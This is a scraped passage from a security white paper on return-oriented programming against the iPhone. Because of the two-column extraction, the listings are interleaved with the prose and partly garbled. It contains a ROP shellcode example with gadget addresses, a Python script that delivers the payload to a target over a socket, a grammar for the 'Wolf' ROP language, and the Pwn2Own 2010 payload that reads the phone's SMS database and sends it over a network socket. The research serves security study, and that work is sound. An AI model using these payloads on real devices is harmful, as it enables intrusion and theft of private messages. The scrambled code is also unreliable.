85 5 import binascii
86 //the payload jumps back here 6
87 stack_pointer = eip = 0; 7 f = file(sys.argv[1], ’rb’)
88 free(payload); 8 print "[+] Reading payload from filen"
89 9 payload = f.read()
90 return 0; 10 payload = payload.strip(’n’)
91 } 11 payload = binascii.unhexlify(payload)
92 12 f.close()
93 void startServer() 13 print "[+] Payload length is: ", len(payload)
94 { 14
95 int c, s, val; 15 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
96 socklen_t salen; 16 s.connect((sys.argv[2], int(sys.argv[3])))
97 struct sockaddr_in saddr, client_saddr; 17 s.send( struct.pack(’i’,len(payload) + 4))
98 short port = 1234; 18 print "[+] Sending payload lengthn"
99 19
100 if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP)) < 0) 20 restoreFuncAddr = s.recv(4)
101 { 21 restoreFuncAddr = struct.unpack(’i’, restoreFuncAddr)[0]
102 perror("socket"); 22 print "[+] Restore function is at: ", hex(restoreFuncAddr)
103 return; 23
104 } 24 payload += struct.pack(’i’, restoreFuncAddr)
105 25 s.send(payload)
106 val = 1; 26 print "[+] Sending payload..n"
107 if (setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &val, sizeof(val)) 27 s.close()
< 0) 28 print "[+] Done"
108 {
109 perror("setsockopt"); Listing 2: Python payload deliver script
110 return;
111 } The return-oriented programming shellcode (Listing
112
113 bzero(&saddr, sizeof(saddr)); 3) which in this particular example is used to trigger a
114 saddr.sin_family = AF_INET; vibrate is shown below.
115 saddr.sin_port = htons(port);
116 saddr.sin_addr.s_addr = INADDR_ANY; 1 // garbage for registers r0-r6
117 2 00000000000000000000000000000000000000000000000000000000
118 if (bind(s, (struct sockaddr*)&saddr, sizeof(saddr)) < 0) 3 # actual payload
119 { 4 416a9832665534127386983244332211ff0f0000cd63b63000000000
120 perror("bind"); 5 # EXPLANATION:
121 return; 6 # 0x32986a41; // PC
122 } 7 # // 0x32986a40 0xe8bd4080 pop {r7, lr}
123 8 # // 0x32986a44 0x0000b001 add sp, #4
124 if (listen(s, 5) < 0) 9 # // 0x32986a46 0x00004770 bx lr
125 { 10 # 0x12345566; // r7
126 perror("listen"); 11 # 0x32988673; // LR / PC
127 return; 12 # 0x11223344; // garbage value (skipped over with add sp)
128 } 13 # // 0x32988672 0x0000bd01 pop {r0, pc}
129 14 # 0x00000fff; // r0
130 while(1) 15 # 0x30b663cd; // PC
131 { 16 # // 0x30b663cc <AudioServicesPlaySystemSound>
132 if ((c = accept(s, (struct sockaddr*)&client_saddr, &salen)) 17 # 0x00000000; // r0 (exit code)
< 0)
133 { Listing 3: Return-oriented shellcode example
134 perror("accept");
135 return; To be able to use and adapt the shellcode for other
136 }
137 read_and_exec(c);
possible targets some points must be taken into consid-
138 } eration.
139 }
140
141 int main(int argc, char *argv[])
1. The payload currently misses the address of the
142 { “restoreStack” function in Listing 1, therefore to
143 NSAutoreleasePool * pool = [[NSAutoreleasePool alloc] init];
144 //the "sound system" has to be initialized before using it in
use the example shellcode it is advised to use the
the payload Python script which handles this issue.

11

2. If you want to adapt the shellcode for your own C Example payload: The PWN2OWN 2010
purposes and therefore change the function which iPhone payload in Wolf
handles the payload, you need to alter the “eip” off-
set in the “restore stack” function. 1 from wolf.iphone import *
2
3. You have to make sure that there is a “free” space 3 O_RDONLY = 0
for a PC in the shellcode. 4 AF_INET = 2
5 SOCK_STREAM = 1
6 SIZEOF_SOCKADDR_IN = 16
4. You need to fill the “initial space” as the payload is 7 SIZEOF_STAT = 104
executed after this pop: “pop r0, r1, r2, r3, r4, r5, 8 PROT_READ = 1
9 MAP_SHARED = 1
r6, pc”. 10 ST_SIZE_OFFSET = 60
11 # all of the values below are specific to iPhoneOS 3.1.3 on 3GS
5. As the PC will be automatically filled with the cor- 12 corruptstart = 0x6001000 # heap @ 0x6000000
13 corruptend = 0x6100000
rect address by the python script, the last thing to 14 readstart = 0x328C16A0 # libSystem start
pay attention to is the endianess of the shellcode. 15 readend = 0x3852B513 # libSystem end
16
17 allowcorrupt([corruptstart, corruptend])
18 allowread([readstart, readend])
B Description of the Wolf language in 19
20 # define forward references
EBNF 21 forwardref(filename)
22 forwardref(sin)
Statement = AccessStmnt | ControlFlowStmnt | 23 forwardref(sockloc)
Assignment | ReferenceStmnt | 24 forwardref(fdloc)
LabelStmnt | ForwardRefStmnt | 25 forwardref(statbuf)
DataStmnt; 26
ControlFlowStmnt = GotoStmnt | CallStmnt; 27 ### fd = open(filename, O_RDONLY);
Assignment = SingleAssignment | MultiAssignment; 28 protect(r0, r1)
AccessStmnt = ProtectStmnt | AllowCorruptStmnt | 29 (r0,r1) <<_| (filename, O_RDONLY)
AllowReadStmnt; 30 call(open)
AllowCorruptStmnt = "allowcorrupt" "(" list-of-memranges ")"; 31 protect(r0)
AllowReadStmnt = "allowread" "(" list-of-memranges ")"; 32 mem[fdloc] <<_| r0
CallStmnt = "call" "(" targetAddress ")"; 33 ### sock = socket(AF_INET, SOCK_STREAM, 0);
DataStmnt = DataArrayStmnt | DataAsciiStmnt; 34 protect(r0,r1,r2)
DataArrayStmnt = "data" "(" label, DataType, 35 (r0,r1,r2) <<_| (AF_INET, SOCK_STREAM, 0)
length, numbers-or-xxx, ")"; 36 call(socket)
DataAsciiStmnt = "data" "(" label, "ascii", string ")"; 37 protect(r0)
DataType = "uint8" | "uint16" | "uint32" 38 mem[sockloc] <<_| r0
GotoStmnt = "gotoifnz" "(" register "," label ")"; 39 ### connect(sock, (struct sockaddr *) sin, sizeof(struct
LabelStmnt = "label" "(" label ")"; sockaddr_in));
ProtectStmnt = "protect" "(" list-of-registers ")"; 40 (r0,r1,r2) <<_| (mem[sockloc], sin, SIZEOF_SOCKADDR_IN)
ForwardRefStmnt = "forwardref" "(" label ")"; 41 call(connect)
AssignmentOperator = "<<_|" 42 ### stat(filename, &statbuf);
SingleAssignment = target assignmentOperator expression; 43 protect(r0,r1)
MultiAssignment = "(" target {"," target} ")" 44 (r0,r1) <<_| (filename, statbuf)
assignmentOperator 45 call(stat)
"(" expression { expression } ")"; 46 ### map = mmap(0x0, statbuf.st_size, PROT_READ, MAP_SHARED, fd,
list-of-registers = "[" register {"," register} "]"; 0);
numbers-or-xxx = list-of-numbers | "DONTCARE" 47 protect(none)
list-of-numbers = "[" number {"," number } "]"; 48 (mem[sp], mem[sp+4]) <<_| (mem[fdloc], 0)
list-of-memranges = "[" memrange {"," memrange} "]"; 49 protect(r0,r1,r2,r3)
memrange = "(" number "," number ")"; 50 (r0,r1,r2,r3) <<_| (0, statbuf + ST_SIZE_OFFSET, PROT_READ,
target = register | number | memorylocation; MAP_SHARED)
memorylocation = "mem" "[" memoryindex "]" 51 call(mmap)
memoryindex = register | number | register + number; 52 ### write(sock, map, statbuf.st_size);
register - number; 53 protect(r0)
oct_digit = ’0’ | ’1’ | ’2’ | ’3’ | 54 r1 <<_| r0
’4’ | ’5’ | ’6’ | ’7’; 55 protect(r0,r1,r2)
dec_digit = oct_digit | ’8’ | ’9’; 56 (r0,r2) <<_| (mem[sockloc], statbuf + ST_SIZE_OFFSET)
hex_digit = dec_digit | 57 call(write)
’a’ | ’b’ | ’c’ | ’d’ | ’e’ | ’f’ | 58 ### /* UGLY, UGLY hack! sleep to prevent data truncation */
’A’ | ’B’ | ’C’ | ’D’ | ’E’ | ’F’; 59 ### sleep(16);
oct_number = ’0’ oct_digit {oct_digit}; 60 protect(r0)
dec_number = dec_digit {dec_digit}; 61 r0 <<_| 16 # 16 seconds
hex_number = "0x" hex_digit {hex_digit}; 62 call(sleep)
number = oct_number | dec_number | hex_number; 63 ### exit(0);
64 protect(r0)
65 r0 <<_| 0
The constructs string, expression and register 66 call(exit)
are not explicitly defined for brevity’s sake. A string sim- 67
68 data(filename, ascii, "/var/mobile/Library/SMS/sms.db")
ply is an ASCII string, register is architecture-specific; 69 data(sin, uint8, SIZEOF_SOCKADDR_IN,
expression is any valid formula involving only arith- [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0])
70 data(sockloc, uint32, 1, DONTCARE)
metic and logical operators and constants, registers and 71 data(fdloc, uint32, 1, DONTCARE)
memory locations as operands. 72 data(statbuf, uint8, SIZEOF_STAT, DONTCARE)

12

Everybody be cool, this is a ROPpery - White paper

More Related Content

Similar to Everybody be cool, this is a ROPpery - White paper (20)

Recently uploaded (20)

Everybody be cool, this is a ROPpery - White paper